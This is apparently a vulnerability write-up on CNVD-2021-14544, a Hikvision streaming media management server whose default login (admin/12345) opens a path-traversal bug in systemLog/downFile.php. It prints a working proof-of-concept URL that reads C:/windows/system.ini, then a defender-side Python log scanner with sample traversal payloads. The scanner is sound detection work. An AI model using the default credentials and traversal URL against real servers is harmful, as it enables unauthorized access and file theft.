HIKVISION Streaming Media Management Server: arbitrary file read vulnerability in the management backend (CNVD-2021-14544)
Vulnerability Description
The streaming media management server from Hangzhou Hikvision System Technology Co., Ltd. ships with a weak default password. An attacker who logs in to the management backend with it can then use a file traversal vulnerability to read files and obtain sensitive information.
Vulnerability Impact
HIKVISION Streaming Media Management Server
Network asset mapping
Vulnerability reproduction
The login page is shown below; the default credentials are admin/12345.
The PoC is as follows: after logging in, visiting the following URL downloads the system.ini file.
https://xxx.xxx.xxx.xxx/systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/system.ini
C:/windows/system.ini is read successfully.
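A defender-side check for this issue, added here as an example and not code from the product or the original post: it scans web-server access-log lines (constructed samples) for requests to systemLog/downFile.php whose fileName value, after repeated percent-decoding, resolves outside the directory the endpoint is meant to serve from (LOG_DIR is an assumed value).

```python
"""Flag path-traversal requests to systemLog/downFile.php in access logs.
Added example with constructed sample lines; not code from the product."""
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in combined log format; not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2021:10:00:01 +0000] "GET /systemLog/downFile.php?fileName=2021-01-01.log HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2021:10:00:02 +0000] "GET /systemLog/downFile.php?fileName=../../../../windows/system.ini HTTP/1.1" 200 219
10.0.0.9 - - [01/Jan/2021:10:00:03 +0000] "GET /systemLog/downFile.php?fileName=..%252F..%252Fwindows%252Fwin.ini HTTP/1.1" 200 92
10.0.0.9 - - [01/Jan/2021:10:00:04 +0000] "GET /systemLog/downFile.php?fileName=%2e%2e%5c%2e%2e%5cboot.ini HTTP/1.1" 404 0
10.0.0.7 - - [01/Jan/2021:10:00:05 +0000] "GET /index.php HTTP/1.1" 200 1024
"""
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')
LOG_DIR = "/logs"  # assumed directory the endpoint is meant to serve files from

def decode_fully(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded sequences are not missed."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(file_name: str) -> bool:
    """True if fileName would resolve outside LOG_DIR. Backslashes count as
    separators (the product runs on Windows); absolute paths and drive letters are rejected."""
    value = decode_fully(file_name).replace("\\", "/")
    if value.startswith("/") or re.match(r"^[A-Za-z]:", value):
        return True
    resolved = posixpath.normpath(posixpath.join(LOG_DIR, value))
    return not resolved.startswith(LOG_DIR + "/")

def scan_log(text: str) -> list:
    """One finding per downFile.php request whose fileName escapes the log directory."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        if not parts.path.endswith("/systemLog/downFile.php"):
            continue
        for name in parse_qs(parts.query, keep_blank_values=True).get("fileName", []):
            if is_traversal(name):
                findings.append({"ip": m["ip"], "fileName": decode_fully(name), "status": int(m["status"])})
    return findings
```

Requests with a 200 status in the findings indicate a successful read and deserve priority; a 404 still shows the endpoint being probed.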
This post is licensed under CC BY 4.0 by the author.